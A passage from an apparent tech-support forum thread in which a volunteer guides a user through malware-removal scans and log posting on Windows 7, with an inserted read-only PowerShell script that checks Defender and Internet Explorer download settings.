Note: if there isn't a drop-down menu when the scan is done, then please don't delete anything and close HitmanPro.

Navigate to C:\ProgramData\HitmanPro\Logs open the report and copy and paste it to your next reply.

STEP 6

Download Security Check by screen317 from here.

  • Save it to your Desktop.
  • Double click SecurityCheck.exe and follow the onscreen instructions inside of the black box.
  • A Notepad document should open automatically called checkup.txt; please post the contents of that document.

Regards,

Georgi

#10 sjk117

  • Topic Starter
  • Members
  • 21 posts

Posted 26 October 2014 - 06:19 PM

I will start working through these steps in the order listed. However, I think there is still an issue with the infection. I connected the 'cleaned' computer to the internet and tried to download the fix file, but I get a message that my "Current security settings do not allow this file to be downloaded." It is a plain gray dialog box, with no logo. This was the original symptom.

I'll run the fix and other scans by downloading to a jump drive as I was doing before.

#11 sjk117

  • Topic Starter
  • Members
  • 21 posts

Posted 26 October 2014 - 06:39 PM

Fixlog.txt

Fix result of Farbar Recovery Tool (FRST written by Farbar) (x64) Version: 26-10-2014

Ran by Greg at 2014-10-26 19:25:14 Run:2

Running from C:\Users\Greg\Desktop

Loaded Profile: Greg (Available profiles: Greg)

Boot Mode: Normal

==============================================

Content of fixlist:

*****************

start

FF Extension: Word Layers - C:\Program Files (x86)\Mozilla Firefox\extensions\ugnraew@jqhljqmpngx.net [2013-10-16]

emptytemp:

end

*****************

C:\Program Files (x86)\Mozilla Firefox\extensions\ugnraew@jqhljqmpngx.net => Moved successfully.

EmptyTemp: => Removed 73 MB temporary data.

The system needed a reboot.

==== End of Fixlog ====

Starting Step 1, RKill.

#12 sjk117

  • Topic Starter
  • Members
  • 21 posts

Posted 26 October 2014 - 06:50 PM

Step 1 - Rkill.log

Rkill 2.6.8 by Lawrence Abrams (Grinler)
http://www.bleepingcomputer.com/
Copyright 2008-2014 BleepingComputer.com
More Information about Rkill can be found at this link:
 http://www.bleepingcomputer.com/forums/topic308364.html

Program started at: 10/26/2014 07:46:39 PM in x64 mode.
Windows Version: Windows 7 Home Premium Service Pack 1

Checking for Windows services to stop:

 * No malware services found to stop.

Checking for processes to terminate:

 * No malware processes found to kill.

Checking Registry for malware related settings:

 * No issues found in the Registry.

Resetting .EXE, .COM, & .BAT associations in the Windows Registry.

Performing miscellaneous checks:

 * Windows Defender Disabled

   [HKLM\SOFTWARE\Microsoft\Windows Defender]
   "DisableAntiSpyware" = dword:00000001

Checking Windows Service Integrity:

 * Windows Defender (WinDefend) is not Running.
   Startup Type set to: Manual

Searching for Missing Digital Signatures:

 * No issues found.

Checking HOSTS File:

 * No issues found.

Program finished at: 10/26/2014 07:48:36 PM
Execution time: 0 hours(s), 1 minute(s), and 57 seconds(s)

#13 sjk117

  • Topic Starter
  • Members
  • 21 posts

Posted 26 October 2014 - 07:13 PM

Step 2 RogueKillerx64

Log at pastebin.com: http://pastebin.com/u6J10ibH

#14 B-boy/StyLe/

    Bleepin' Freestyler

  • Malware Response Team
  • 8,307 posts
  • Gender:Male
  • Location:Bulgaria

Posted 26 October 2014 - 07:14 PM

I will start working through these steps in the order listed. However, I think there is still an issue with the infection. I connected the 'cleaned' computer to the internet and tried to download the fix file, but I get a message that my "Current security settings do not allow this file to be downloaded." It is a plain gray dialog box, with no logo. This was the original symptom.

I'll run the fix and other scans by downloading to a jump drive as I was doing before.

Hi,

If you are using Internet Explorer, then go ahead and reset all zones to default settings:

http://windows.microsoft.com/en-us/windows7/change-internet-explorer-9-security-settings

Regards,

Georgi


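As an added example (not from this thread, from Georgi, or from any of the tools he lists), the following read-only PowerShell check looks at the two things the posts above surface: the DisableAntiSpyware registry value that RKill reported, and the Internet zone file-download action behind the "security settings do not allow this file to be downloaded" message. The value name 1803 under Zones\3 is Internet Explorer's URL action for file downloads; the Policies\...\Windows Defender path and the Security_HKLM_only policy flag mentioned in the comments are standard Windows locations, not something taken from this thread, and the script changes nothing.

```powershell
# Added example: read-only triage of the settings discussed in this thread.
# Uses only built-in cmdlets so it also works on Windows 7 / PowerShell 2.0.
# Run from an elevated PowerShell prompt on the machine being checked.

function Get-DefenderDisableFlag {
    # RKill reported HKLM\SOFTWARE\Microsoft\Windows Defender\DisableAntiSpyware = 1.
    # The Policies hive is the Group Policy equivalent of the same setting.
    $paths = @(
        'HKLM:\SOFTWARE\Microsoft\Windows Defender',
        'HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender'
    )
    foreach ($p in $paths) {
        if (Test-Path $p) {
            $v = (Get-ItemProperty -Path $p -ErrorAction SilentlyContinue).DisableAntiSpyware
            if ($v -eq 1) {
                New-Object PSObject -Property @{ Path = $p; DisableAntiSpyware = $v }
            }
        }
    }
}

function Get-IEFileDownloadSetting {
    # Value 1803 (URLACTION_SHELL_FILE_DOWNLOAD) under each zone key controls
    # "File download": 0 = enabled, 3 = disabled. Zone 3 is the Internet zone.
    # HKCU normally applies; HKLM applies when the Security_HKLM_only policy is set.
    foreach ($hive in 'HKCU', 'HKLM') {
        $p = "${hive}:\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3"
        if (Test-Path $p) {
            $v = (Get-ItemProperty -Path $p -ErrorAction SilentlyContinue).'1803'
            $state = if ($null -eq $v) { 'not set' }
                     elseif ($v -eq 0)  { 'enabled' }
                     elseif ($v -eq 3)  { 'disabled' }
                     else               { "unknown ($v)" }
            New-Object PSObject -Property @{ Hive = $hive; Value = $v; FileDownload = $state }
        }
    }
}

# WinDefend service state and start mode, as RKill printed them ("Manual").
function Get-WinDefendService {
    Get-WmiObject Win32_Service -Filter "Name='WinDefend'" |
        Select-Object Name, State, StartMode
}

Get-DefenderDisableFlag
Get-IEFileDownloadSetting
Get-WinDefendService
```

A FileDownload value of "disabled" in HKCU (or in HKLM with Security_HKLM_only set) is the setting that Georgi's zone reset clears; the Defender flag is worth re-checking after the remaining scans because it was still set in the RKill log above.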

#15 sjk117

  • Topic Starter
  • Members
  • 21 posts

Posted 26 October 2014 - 07:29 PM

TDSSKiller report

http://pastebin.com/5pX1k1FU
